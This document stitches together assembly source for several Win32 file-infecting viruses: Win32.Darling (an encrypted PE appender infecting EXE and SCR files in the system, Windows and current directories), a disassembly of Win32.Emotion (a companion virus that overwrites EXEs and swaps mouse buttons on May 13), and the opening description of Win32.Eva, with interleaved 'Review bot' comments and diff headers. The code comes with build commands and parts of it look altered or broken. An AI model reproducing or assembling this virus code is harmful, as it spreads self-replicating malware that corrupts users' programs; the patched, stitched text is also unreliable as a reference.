; - Variable encrypting (32-bit key).
; - Traps possible errors with a SEH.
; - Infects files in current/windoze/system-directory.
; - Non-destructive payload (ARGHHH!!!!!).
;
;
; Nothing brand new at all, this is just a quick Win32.Savior hack, with
; some improvements. Now it fetches API from KERNEL32.DLL's export-table,
; so it doesn't have to rely on the host's imports anymore...
;
; Succesfully tested on Win95 (OSR/2), Win98, and WinNT (4.0).
;
;
; KNOWN PROBLEMS:
;
; For some reason my infected dummy-files start executing wrongly decrypted
; code, this only happens when a small file is executed two times in a row,
; under NT. It doesn't look like a bug of mine, I suspect the caching is
; fucking things up.
;
;
; Assemble with: TASM32 SAVIOR.ASM /m /ml
; TLINK32 SAVIOR.OBJ IMPORT32.LIB
; PEWRSEC SAVIOR.EXE
;
;============================================================================
.386p
.MODEL FLAT
.CODE
ORG 0
EXTRN ExitProcess:PROC ; Only used by the carrier.
Debug_Mode = 1 ; If true, only DUM?.* files are
; targetted for infection.
Virus_Size EQU (Virus_End-START)
Virus_Size_Mem EQU (Virus_End_Mem-START)
Max_Infect EQU 4
Min_Size_Infect EQU 4096
START:
push eax
lidt [esp-2]
pop eax
jmp Carrier
PUSH ESP ; Reserve room for EIP.
PUSHFD ; Save registers & flags.
PUSHAD
CALL Get_Delta ; Get our location in memory.
Anti_Moron DB 0E9h ; Overlapping code, anti BP.
Get_Delta: POP EBP
SUB EBP, (Anti_Moron-START)
MOV EAX, 0
Init_Key = DWORD PTR $-4
MOV EBX, 0
Init_Slide = DWORD PTR $-4
MOV ECX, (Virus_End-Encrypted) / 4
PUSH EBP
Decrypt_DWORD: XOR [EBP+(Virus_Size-4)], EAX
SUB EBP, 4
ADD EAX, EBX ; Slide decryption-key.
RCL EBX, 3 ; Slide key-slider.
LOOP Decrypt_DWORD
POP EBP
IF (($-START) MOD 4) GT 0
DB (4 - (($-START) MOD 4)) DUP(90h)
ENDIF
Encrypted: MOV EAX, EBP
SUB EAX, 1000h ; Calculate image-base.
Base_Displ = DWORD PTR $-4
LEA EBX, [EAX+((Carrier-START)+1000h)]
Old_EIP_RVA = DWORD PTR $-4
MOV [ESP+(9*4)], EBX ; Set address host in stack.
CALL Setup_SEH ; PUSH SEH-address on stack.
MOV ESP, [ESP+(2*4)] ; Restore original stack.
JMP Restore_SEH ; Terminate program-flow.
Setup_SEH: PUSH DWORD PTR FS:[ECX] ; Save original SEH-pointer.
; MOV FS:[ECX], ESP ; Set our own SEH.
CLD
MOV EAX, [ESP+(12*4)]
XOR AX, AX
Find_K32_Base: CMP EAX, 400000h ; Below application-memory?
JB JMP_Rest_SEH ; ARGHH! Not found!
CMP [EAX.EXE_Mark], 'ZM'
JNE Scan_Downwards
CMP [EAX.Reloc_Table], 40h
JB Scan_Downwards
MOV EBX, [EAX+3Ch]
ADD EBX, EAX
CMP [EBX.PE_Mark], 'EP'
JNE Scan_Downwards
MOV EBX, [EBX+120] ; K32's export-table.
ADD EBX, EAX
MOV ESI, [EBX+(3*4)] ; ASCIIZ-name of DLL.
ADD ESI, EAX
PUSH EAX
LODSD
CALL Upcase_EAX
XCHG ECX, EAX
LODSD
CALL Upcase_EAX
CMP EAX, '23LE' ; Check for KERNEL32.DLL.
POP EAX
JNE Scan_Downwards
CMP ECX, 'NREK' ; Found KERNEL32.DLL ?
JE Found_K32_Base
Scan_Downwards: SUB EAX, 65536
JMP Find_K32_Base
Virus_Name DB 'Win32.Darling v1.00', 0
JMP_Rest_SEH: JMP Restore_SEH ; Abort all.
Found_K32_Base: MOV EDX, [EBX+(8*4)] ; Array of name RVA's.
ADD EDX, EAX
MOV ECX, [EBX+(6*4)] ; Amount of name entries.
DEC ECX ; Last entry name.
Find_GPA: MOV EDI, [EDX+(ECX*4)] ; Offset name.
ADD EDI, EAX
PUSHAD
LEA ESI, [EBP+(GetProcAddress_Name-START)]
PUSH 15
POP ECX
REPE CMPSB
POPAD
JNE LOOP_Find_GPA
MOV ESI, [EBX+(9*4)] ; Array of API ordinals.
ADD ESI, EAX
MOVZX ESI, WORD PTR [ESI+(ECX*2)]
MOV EBX, [EBX+(7*4)] ; Array of API RVA's.
ADD EBX, EAX
LEA EBX, [EBX+(ESI*4)]
MOV ESI, [EBX]
ADD ESI, EAX
MOV [EBP+(GetProcAddress-START)], ESI
LOOP_Find_GPA: LOOP Find_GPA
XCHG EBX, EAX
LEA ESI, [EBP+(API_Names-START)]
LEA EDI, [EBP+(API_Addresses-START)]
Loop_Get_API: PUSH ESI
PUSH EBX
CALL [EBP+(GetProcAddress-START)]
CLD ; Store API-address.
STOSD
XCHG ECX, EAX ; API not found?
JECXZ JMP_Rest_SEH
Find_Next_API: LODSB
OR AL, AL ; Found end of API-name?
JNZ Find_Next_API
CMP [ESI], AL ; We've did 'em all?
JNZ Loop_Get_API
LEA ESI, [EBP+(Current_Directory-START)]
MOV EBX, 260
PUSH ESI
PUSH ESI ; Retrieve current path.
PUSH EBX
CALL [EBP+(GetCurrentDirectoryA-START)]
ADD ESI, EBX
PUSH ESI
PUSH EBX ; Retrieve Windoze-directory.
PUSH ESI
CALL [EBP+(GetWindowsDirectoryA-START)]
ADD ESI, EBX
PUSH ESI
PUSH EBX ; Retrieve System-directory.
PUSH ESI
CALL [EBP+(GetSystemDirectoryA-START)]
; Infect files in System-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
; Infect files in Windoze-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
; Infect files in current-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
CALL [EBP+(GetTickCount-START)]
CMP AL, 10
JA Restore_SEH
jmp Restore_SEH
;gall
LEA EAX, [EBP+(USER32_Name-START)]
PUSH EAX
CALL [EBP+(GetModuleHandleA-START)]
XCHG ECX, EAX
JECXZ Restore_SEH
LEA EAX, [EBP+(MessageBoxA_Name-START)]
PUSH EAX
PUSH ECX
CALL [EBP+(GetProcAddress-START)]
OR EAX, EAX
JZ Restore_SEH
XCHG EBX, EAX
; Display an OK/Cancel-box with a message.
Show_Our_Box: PUSH 30h OR 01h
LEA EAX, [EBP+(Payload_Title-START)]
PUSH EAX
LEA EAX, [EBP+(Payload_Text-START)]
PUSH EAX
PUSH 0
CALL EBX
DEC EAX ; They're disrespecting us
DEC EAX ; by clicking on Cancel?
JZ Show_Our_Box ; Then just repeat all.
Restore_SEH: XOR EAX, EAX
POP DWORD PTR FS:[EAX] ; Restore original SEH.
POP EAX ; Trash handler-address.
Execute_Host: POPAD ; Restore registers & flags.
POPFD
RET ; RETurn to our host.
Payload_Title DB 'http://www.drrling.se', 0
Payload_Text DB 'THIS IS A DEDICATION TO THE BEST MAGAZINE '
DB 'IN SWEDEN, DARLING. - IR IN ''99', 0
Infect_Directory:
PUSHAD
; Clear infection-counter.
AND BYTE PTR [EBP+(Infect_Counter-START)], 0
LEA EAX, [EBP+(Search_Record-START)]
PUSH EAX
LEA EAX, [EBP+(Search_Mask-START)]
PUSH EAX
CALL [EBP+(FindFirstFileA-START)]
MOV ESI, EAX ; Save search-handle in ESI.
INC EAX
JZ Exit_Inf_Dir
Infect_Loop: PUSHAD
LEA EBX, [EBP+(Search_Record.Find_File_Name-START)]
MOV ESI, EBX
CLD
Find_End_Name: LODSB ; Get next byte of filename.
OR AL, AL ; Found end of the ASCIIZ ?
JNZ Find_End_Name
MOV EAX, [ESI-5] ; Get extension DWORD.
CALL Upcase_EAX
CMP EAX, 'EXE.' ; Standard .EXE-file?
JE Extension_OK
CMP EAX, 'RCS.' ; Screensaver?
JNE Exit_Infect
Extension_OK: PUSH EBX
CALL [EBP+(GetFileAttributesA-START)]
CMP EAX, -1 ; Error occurred?
JE Exit_Infect
MOV ESI, EAX
AND AL, NOT 00000001b ; Get rid of readonly-flag.
PUSH EAX
PUSH EBX
CALL [EBP+(SetFileAttributesA-START)]
DEC EAX ; Error occurred?
JNZ Exit_Infect
PUSH ESI ; PUSH filename + attributes
PUSH EBX ; for Restore_Attr.
PUSH EAX ; Open candidate-file.
PUSH EAX
PUSH 3 ; Open existing.
PUSH EAX
PUSH EAX
PUSH 80000000h OR 40000000h ; Read/write-access.
PUSH EBX
CALL [EBP+(CreateFileA-START)]
MOV [EBP+(File_Handle-START)], EAX
MOV ESI, EAX
INC EAX ; Error occurred?
JZ Restore_Attr
PUSH ESI ; For CloseHandle.
PUSH 0 ; Get candidate's filesize.
PUSH ESI
CALL [EBP+(GetFileSize-START)]
CMP EAX, Min_Size_Infect ; File too small?
JB Close_Handle
LEA EAX, [EBP+(Time_Last_Write-START)]
PUSH EAX ; Get filedates & times.
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH ESI
CALL [EBP+(GetFileTime-START)]
; Read the MZ-header.
Read_Header: LEA EBX, [EBP+(Header-START)]
PUSH 40h
POP ECX
CALL Read_File
JNZ Close_Handle
CMP [EBX.EXE_Mark], 'ZM' ; It must be a true EXE-file.
JNE Close_Handle
CMP [EBX.Reloc_Table], 40h ; Contains a new EXE-header?
JB Close_Handle
MOV ESI, [EBX+3Ch]
MOV EAX, ESI ; Seek to PE-header.
CALL Seek_File
JZ Close_Handle
PUSH 92 ; Read-in the PE-header.
POP ECX
CALL Read_File
JNZ Close_Handle
CMP [EBX.PE_Mark], 'EP' ; Verify it's a PE-header.
JNE Close_Handle
; Program is executable?
TEST BYTE PTR [EBX.PE_Flags], 00000010b
JZ Close_Handle
; Don't infect DLL's.
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Close_Handle
CMP [EBX.CPU_Type], 14Ch ; Must be a 386+ file.
JNE Close_Handle
; Is it already infected?
CMP [EBX.Checksum], 93FB2AA7h
JE Close_Handle
PUSH ESI
; Calculate position of the last section-header.
MOVZX EAX, [EBX.Number_Of_Sections]
DEC AX
PUSH 40
POP ECX
MUL ECX
; Calculate size of PE-header.
MOV DX, [EBX.NT_Header_Size]
ADD DX, 24
LEA ECX, [ESI+EDX] ; Start section-headers.
ADD EAX, ECX ; EAX = last section-header.
PUSH EAX
; Seek to last section-header.
CALL Seek_File
LEA ESI, [EBP+(Last_Section_Header-START)]
PUSH EBX
MOV EBX, ESI ; Read last section-header.
PUSH 40
POP ECX
CALL Read_File
POP EBX
MOV EAX, [ESI.Section_RVA]
ADD EAX, [ESI.Section_Physical_Size]
MOV [EBP+(Base_Displ-START)], EAX
XCHG [EBX.EIP_RVA], EAX
MOV [EBP+(Old_EIP_RVA-START)], EAX
; Seek to the end of the section.
MOV EAX, [ESI.Section_Physical_Offset]
ADD EAX, [ESI.Section_Physical_Size]
CALL Seek_File
MOV EAX, [ESI.Section_Physical_Size]
ADD EAX, Virus_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
MOV [ESI.Section_Physical_Size], EAX
XCHG EDI, EAX ; Save physical-size in EDI.
MOV EAX, [ESI.Section_Virtual_Size]
MOV ECX, [EBX.Object_Align]
CALL Align_EAX
SUB [EBX.Image_Size], EAX
ADD EAX, Virus_Size_Mem - 1
Calc_Mem_Size: INC EAX
CALL Align_EAX
CMP EAX, EDI ; Virtual-size may not be
JB Calc_Mem_Size ; smaller than physical-size.
MOV [ESI.Section_Virtual_Size], EAX
ADD [EBX.Image_Size], EAX
; Set section-flags: read, write, executable, & code.
OR [ESI.Section_Flags], 11100000000000000000000000100000b
LEA EDI, [EBP+(Buffer-START)]
PUSHAD
; Get a random slide-key.
CALL [EBP+(GetTickCount-START)]
MOV [EBP+(Init_Slide-START)], EAX
XCHG EBX, EAX
; Get a random encryption-key.
CALL [EBP+(GetTickCount-START)]
MOV [EBP+(Init_Key-START)], EAX
MOV ESI, EBP
MOV ECX, (Virus_Size / 4)
CLD
REP MOVSD
MOV ECX, (Virus_End-Encrypted) / 4
Encrypt_DWORD: SUB EDI, 4
XOR [EDI], EAX
ADD EAX, EBX
RCL EBX, 3
LOOP Encrypt_DWORD
POPAD
MOV EDX, EDI ; Write virusbody to end
MOV ECX, Virus_Size ; of the last section.
CALL Write_File
POP EAX ; Offset last object-header.
CALL Seek_File
; Write updated section-header back to file.
PUSH 40
POP ECX
LEA EDX, [EBP+(Last_Section_Header-START)]
CALL Write_File
; Seek to end of file.
PUSH 2
PUSH EAX
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFilePointer-START)]
XOR EDX, EDX ; Zero-pad the infected file.
MOV EDI, [EBX.File_Align]
DIV EDI
OR EDX, EDX ; File is already aligned?
JZ Mark_Inf_File
SUB EDI, EDX ; Howmany bytes to pad?
Zero_Pad: PUSH 1 ; Write a padding-byte.
POP ECX
LEA EDX, [EBP+(Zero_Tolerance-START)]
CALL Write_File
DEC EDI ; We've did 'em all?
JNZ Zero_Pad
Mark_Inf_File: MOV [EBX.Checksum], 93FB2AA7h
POP EAX ; Seek to start of PE-header.
CALL Seek_File
PUSH 92 ; Write updated PE-header.
POP ECX
MOV EDX, EBX
CALL Write_File
; Increment our infection-counter.
INC BYTE PTR [EBP+(Infect_Counter-START)]
; Restore original file-dates & times.
Restore_Stamp: LEA EAX, [EBP+(Time_Last_Write-START)]
PUSH EAX
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFileTime-START)]
Close_Handle: CALL [EBP+(CloseHandle-START)]
Restore_Attr: CALL [EBP+(SetFileAttributesA-START)]
Exit_Infect: POPAD
; We've did enough infections?
CMP BYTE PTR [EBP+(Infect_Counter-START)], Max_Infect
JNB Close_Find
; Find another file.
LEA EAX, [EBP+(Search_Record-START)]
PUSH EAX
PUSH ESI
CALL [EBP+(FindNextFileA-START)]
DEC EAX ; Continue if search went OK.
JZ Infect_Loop
Close_Find: PUSH ESI ; Close search-handle.
CALL [EBP+(FindClose-START)]
Exit_Inf_Dir: POPAD
RET
; EAX = Offset.
; Returns ZF if error.
Seek_File:
PUSH 0
PUSH 0
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFilePointer-START)]
INC EAX
RET
; EBX = Buffer.
; ECX = Bytes to read.
; Returns ZF if successful.
Read_File:
PUSH 0
LEA EAX, [EBP+(Bytes_Read-START)]
PUSH EAX
PUSH ECX
PUSH EBX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(ReadFile-START)]
DEC EAX
RET
; ECX = Amount of bytes.
; EDX = Buffer.
; Returns ZF if successful.
Write_File:
PUSH 0
LEA EAX, [EBP+(Bytes_Read-START)]
PUSH EAX
PUSH ECX
PUSH EDX
PUSH 12345678h
File_Handle = DWORD PTR $-4
CALL [EBP+(WriteFile-START)]
DEC EAX
RET
Align_EAX:
XOR EDX, EDX
DIV ECX
OR EDX, EDX ; Even division?
JZ No_Round ; Then no need to round-up.
INC EAX ; Round-up.
No_Round: MUL ECX
RET
Upcase_EAX:
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
Upcase_AL: CMP AL, 'a'
JB Exit_Upcase_AL
CMP AL, 'z'
JA Exit_Upcase_AL
SUB AL, 'a' - 'A'
Exit_Upcase_AL: RET
IF Debug_Mode
Search_Mask DB 'DUM?.*', 0
ELSE
Search_Mask DB '*.*', 0
ENDIF
USER32_Name DB 'USER32', 0
MessageBoxA_Name DB 'MessageBoxA', 0
GetProcAddress_Name DB 'GetProcAddress', 0
API_Names: DB 'GetCurrentDirectoryA', 0
DB 'SetCurrentDirectoryA', 0
DB 'GetWindowsDirectoryA', 0
DB 'GetSystemDirectoryA', 0
DB 'FindFirstFileA', 0
DB 'FindNextFileA', 0
DB 'FindClose', 0
DB 'GetFileAttributesA', 0
DB 'SetFileAttributesA', 0
DB 'CreateFileA', 0
DB 'CloseHandle', 0
DB 'GetFileTime', 0
DB 'SetFileTime', 0
DB 'GetFileSize', 0
DB 'SetFilePointer', 0
DB 'ReadFile', 0
DB 'WriteFile', 0
DB 'GetModuleHandleA', 0
DB 'GetTickCount', 0
Zero_Tolerance DB 0
IF (($-START) MOD 4) GT 0
DB (4 - (($-START) MOD 4)) DUP(0)
ENDIF
Virus_End:
API_Addresses:
; === Our needed API from KERNEL32.DLL. ===
GetCurrentDirectoryA DD 0
SetCurrentDirectoryA DD 0
GetWindowsDirectoryA DD 0
GetSystemDirectoryA DD 0
FindFirstFileA DD 0
FindNextFileA DD 0
FindClose DD 0
GetFileAttributesA DD 0
SetFileAttributesA DD 0
CreateFileA DD 0
CloseHandle DD 0
GetFileTime DD 0
SetFileTime DD 0
GetFileSize DD 0
SetFilePointer DD 0
ReadFile DD 0
WriteFile DD 0
GetModuleHandleA DD 0
GetTickCount DD 0
GetProcAddress DD 0
Time_Creation DD 0, 0
Time_Last_Access DD 0, 0
Time_Last_Write DD 0, 0
Infect_Counter DB 0
Bytes_Read DD 0
Header DB 92 DUP(0)
Last_Section_Header DB 40 DUP(0)
Search_Record DB 318 DUP(0)
Current_Directory DB 260 DUP(0)
Windows_Directory DB 260 DUP(0)
System_Directory DB 260 DUP(0)
Buffer DB Virus_Size DUP(0)
Virus_End_Mem:
Carrier:
PUSH 0 ; Terminate current process.
CALL ExitProcess
;---------------------- SOME USED STRUCTURES --------------------------------
EXE_Header STRUC
EXE_Mark DW 0 ; MZ-marker (MZ or ZM).
Image_Mod_512 DW 0
Image_512_Pages DW 0
Reloc_Items DW 0
Header_Size_Mem DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
MZ_Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
PE_Header STRUC
PE_Mark DD 0 ; PE-marker (PE/0/0).
CPU_Type DW 0 ; Minimal CPU required.
Number_Of_Sections DW 0 ; Number of sections in PE.
DD 0
Reserved_1 DD 0
DD 0
NT_Header_Size DW 0
PE_Flags DW 0
DD 4 DUP(0)
EIP_RVA DD 0
DD 2 DUP(0)
Image_Base DD 0
Object_Align DD 0
File_Align DD 0
DW 0, 0
DW 0, 0
DW 0, 0
DD 0
Image_Size DD 0
DD 0
Checksum DD 0
PE_Header ENDS
Section_Header STRUC
Section_Name DB 8 DUP(0) ; Zero-padded section-name.
Section_Virtual_Size DD 0 ; Memory-size of section.
Section_RVA DD 0 ; Start section in memory.
Section_Physical_Size DD 0 ; Section-size in file.
Section_Physical_Offset DD 0 ; Section file-offset.
Section_Reserved_1 DD 0 ; Not used for executables.
Section_Reserved_2 DD 0 ; Not used for executables.
Section_Reserved_3 DD 0 ; Not used for executables.
Section_Flags DD 0 ; Flags of the section.
Section_Header ENDS
Find_First_Next_Win32 STRUC
File_Attributes DD 0
Creation_Time DD 0, 0
Last_Accessed_Time DD 0, 0
Last_Written_Time DD 0, 0
Find_File_Size_High DD 0
Find_File_Size_Low DD 0
Find_Reserved_1 DD 0
Find_Reserved_2 DD 0
Find_File_Name DB 260 DUP(0)
Find_DOS_File_Name DB 14 DUP(0)
Find_First_Next_Win32 ENDS
END START
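Review bot: The value 93FB2AA7h is written into the PE Checksum field at `Mark_Inf_File` and compared at the "Is it already infected?" check, but neither site says this is the file marker beyond the question in the comment; a note at the store, e.g. `; Infection marker: PE Checksum field forced to 93FB2AA7h (compared before processing)`, would make the indicator explicit for anyone examining affected files. The assemble instructions in the header still refer to SAVIOR.ASM/SAVIOR.OBJ/SAVIOR.EXE although the file is Win32.Darling, which the header itself describes as a hack of Win32.Savior; the file names in that comment look like a leftover and could be corrected.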
+267
@@ -0,0 +1,267 @@
comment *
Win32.Emotion ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Emotion is a 4608 bytes direct action companion EXE virus. Infects
every file in current directory and Windows directory, when executed, by
moving the original EXE file to a BIN file by the same name and overwriting
the original EXE file with the virus.
Compile Win32.Emotion with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML EMOTION.ASM
TLINK32 -Tpe -x -aa EMOTION.OBJ,,, IMPORT32
VGALIGN EMOTION.EXE
PEWRSEC EMOTION.EXE
*
jumps
locals
.386
.model flat
; KERNEL32.dll
extrn ExitProcess:proc
extrn GetModuleHandleA:proc
extrn FindNextFileA:proc
extrn GetCommandLineA:proc
extrn FindFirstFileA:proc
extrn CopyFileA:proc
extrn GetSystemTime:proc
extrn GetWindowsDirectoryA:proc
extrn MoveFileA:proc
extrn SetCurrentDirectoryA:proc
extrn WinExec:proc
extrn GetModuleFileNameA:proc
; USER32.dll
extrn SwapMouseButton:proc
extrn MessageBoxA:proc
.data
MAX_PATH equ 104h
NULL equ 00h
TRUE equ 01h
MB_ICONHAND equ 10h ; A stop-sign icon appears in the
; message box
SW_SHOWNORMAL equ 01h ; Activates and displays a window
INVALID_HANDLE_VALUE equ -01h
FALSE equ 00h
SYSTEMTIME struct
wYear WORD ? ; Specifies the current year
wMonth WORD ? ; Specifies the current month;
; January = 1, February = 2, and so on
wDayOfWeek WORD ? ; Specifies the current day of the
; week
wDay WORD ? ; Specifies the current day of the
; month
wHour WORD ? ; Specifies the current hour
wMinute WORD ? ; Specifies the current minute
wSecond WORD ? ; Specifies the current second
wMilliseconds WORD ? ; Specifies the current millisecond
ends
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
db ?
.code
code_begin:
push NULL ; Get module handle of KERNEL32.dll
call GetModuleHandleA
push MAX_PATH ; Size of buffer, in characters
push offset cFilename ; Pointer to buffer for module path
push eax ; Handle to module to find filename
; for
call GetModuleFileNameA
jmp _FindFirstFileA
_GetWindowsDirectoryA:
push MAX_PATH ; Size of directory buffer
push offset cBuffer ; Address of buffer for Windows
; directory
call GetWindowsDirectoryA
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
mov [set_current_directory],TRUE
jmp _FindFirstFileA
_GetCommandLineA:
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
lea edi,szCmdLine ; EDI = pointer to szCmdLine
move_commandline_loop:
stosb ; Store a byte of command-line
lodsb ; AL = a byte of command-line
or al,al ; End of command-line?
jnz move_commandline_loop ; Not zero? Jump to
; move_commandline_loop
mov eax,'.' ; Dot
lea edi,szCmdLine ; EDI = pointer to szCmdLine
mov ecx,MAX_PATH ; ECX = size of directory buffer
repne scasb ; Find the dot in the filename
mov dword ptr [edi],' nib' ; Change the extention of the filename
; to .BIN
mov word ptr [szCmdLine],' '
push offset SystemTime ; Address of system time structure
call GetSystemTime
cmp byte ptr [SystemTime.wMonth],05h
jne _WinExec ; May? Jump to _WinExec
cmp byte ptr [SystemTime.wDay],0dh
jne _WinExec ; 13th of May? Jump to _WinExec
push MB_ICONHAND ; A stop-sign icon appears in the
; message box
push offset szCaption ; Address of title of message box
push offset szText ; Address of text in message box
push NULL ; Message box has no owner window
call MessageBoxA
push TRUE ; Reverse buttons
call SwapMouseButton
_WinExec:
push SW_SHOWNORMAL ; Activates and displays a window
push offset szCmdLine ; Address of command-line
call WinExec
push 00h ; Exit code for all threads
call ExitProcess
_FindFirstFileA:
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
cmp eax,INVALID_HANDLE_VALUE
je function_failed ; Function failed? Jump to
; function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
push eax ; EAX = search handle
jmp move_filename
_FindNextFileA:
push edi ; EDI = pointer to FindFileData
lea edi,[edi+cFileName-WIN32_FIND_DATA]
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
pop edi ; EDI = pointer to FindFileData
pop eax ; EAX = search handle
push eax ; EAX = search handle
push edi ; Address of structure for data on
; found file
push eax ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
jmp move_filename
function_failed:
cmp [set_current_directory],TRUE
je _GetCommandLineA ; Equal? Jump to _GetCommandLineA
jmp _GetWindowsDirectoryA
move_filename:
push edi ; EDI = pointer to FindFileData
lea si,[edi+cFileName-WIN32_FIND_DATA]
lea edi,szNewFileName ; EDI = pointer to szNewFileName
move_filename_loop:
lodsb ; AL = a byte of command-line
stosb ; Store a byte of command-line
or al,al ; End of command-line?
jnz move_filename_loop ; Not zero? Jump to move_filename_loop
xor eax,eax ; Zero EAX
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,41h ; Search through sixty-five characters
repne scasb ; Find end of filename
mov dword ptr [edi-04h],'nib'
pop edi ; EDI = pointer to FindFileData
push offset szNewFileName ; Address of new name for the file
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of name of the existing file
call MoveFileA
push FALSE ; If file already exists, overwrite it
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of filename to copy to
lea eax,szExistingFileName ; EAX = pointer to szExistingFileName
push eax ; Address of name of an existing file
call CopyFileA
jmp _FindNextFileA
code_end:
szFileName db '*.EXE',00h ; Name of file to search for
szCaption db 'w32.Emotion - By: Techno Phunk [TI]',00h
szText db 'A pool of emotions, beaten and abused.',0dh,0ah
db 'Who will swim in the stale waters? Not a one',0dh,0ah
db 'But many will scoff and destroy this pool with apathy',00h
szCurDir:
cBuffer db MAX_PATH dup(00h)
; Buffer for Windows directory
szNewFileName db MAX_PATH dup(00h)
; New name for the file
szExistingFileName:
szCmdLine:
cFilename db MAX_PATH dup(00h)
; Buffer for module path
SystemTime SYSTEMTIME <>
set_current_directory db FALSE
FindFileData WIN32_FIND_DATA <>
data_end:
end code_begin
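Review bot: The description block at the top of this file omits the payload and the on-disk artefact, both of which matter to anyone triaging the sample. The code compares `SystemTime.wMonth` with 05h and `SystemTime.wDay` with 0dh before calling `MessageBoxA` and `SwapMouseButton`, so the description should state that on May 13 a stop-icon message box is shown and the mouse buttons are swapped. It should also state that each host `*.EXE` is first preserved by `MoveFileA` under the same base name with a `.bin` extension (the `'nib'` store at `[edi-04h]`) before `CopyFileA` overwrites the original name with the virus, since that sibling file is what a clean-up restores. Suggested lines after the second paragraph: `; Payload: on May 13th displays an MB_ICONHAND message box and calls SwapMouseButton(TRUE)` and `; Recovery: the host survives as <name>.bin next to the overwritten <name>.EXE`.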
+686
@@ -0,0 +1,686 @@
;Win32.Eva virus.
;(c) 1999 by Benny
;
;
;Author's description
;---------------------
;
;Let me introduce my first COMPLETE Win32 infector. Yeah, i have written several parts
;of viruses, but this babe is my tiniest one with all needed functions to spread out.
;Win32.Eva is simple appender, infects one EXE file by changing pointer at 3ch
;in the MZ header, which points to new exe. After infection, MZ_lfanew pointer will be
;pointing to the viruses new PE header. So, if u will execute infected program under Win9X,
;WinNT or under Win3.1x with Win32s subsystem, program will start at the new location.
;After virus will be done with his work executes program again with changed
;MZ_lfanew pointer, that will be pointing to the original PE header.
;
;
;Payload
;--------
;
;On February the 2nd will display message box with some stupid comments.
;
;
;To build
;---------
;
;tasm32 -ml -m5 -q eva.asm
;tlink32 -Tpe -c -x -aa -r eva,,, import32
;pewrsec eva.exe (thanx Jacky !)
;
;
;AVP's description
;------------------
;
;This is a direct action (nonmemory resident) parasitic Win32 infector. It
;searches for PE EXE files in the Windows, Windows system [* Benny's note: it
;DOESN'T infect files in Windows/System directory!] and current directories,
;then writes itself to the end of the file. While infecting the virus does not
;modify the PE header at all, the infection way is based only on DOS Stub
;header: the virus writes to there new file offset of PE header (virus PE
;header). As a result the infected file has three parts: first part is original
;DOS stub, the second part is host PE data (not modified), third part is virus
;code and data.
;
;The virus has PE file structure: it contains PE header, section headers, import
;table, code and data sections. The modified DOS stub in infected files points
;to virus PE header instead of original ones. As a result, Windows32 while
;executing infected files reads and runs virus code instead of host one.
;
;To return to the host program the virus creates a copy of the infected file,
;disinfects it (just restores file offset of PE header) and spawns.
;
;On February 2nd the virus displays the message window:
;
; Win32.Eva by Benny, (c) 1999
; Hello stupid user, i'm so sorry, but i have to interrupt your work,
; 'cause I hate this shitty program. Click OK to continue.
;
; Greets to:
; Super/29A
; Darkman/29A
; Jacky Qwerty/29A
; Billy Belcebu/DDT
; and many other 29Aers...
;
;
;Some greets
;------------
;
;All 29Aers.... And thats only the beginnin' :-)
;Super/29A..... However, blue screen is still the best Sexy's effect :-)
;
;
;Who is Eva ?
;-------------------------
;
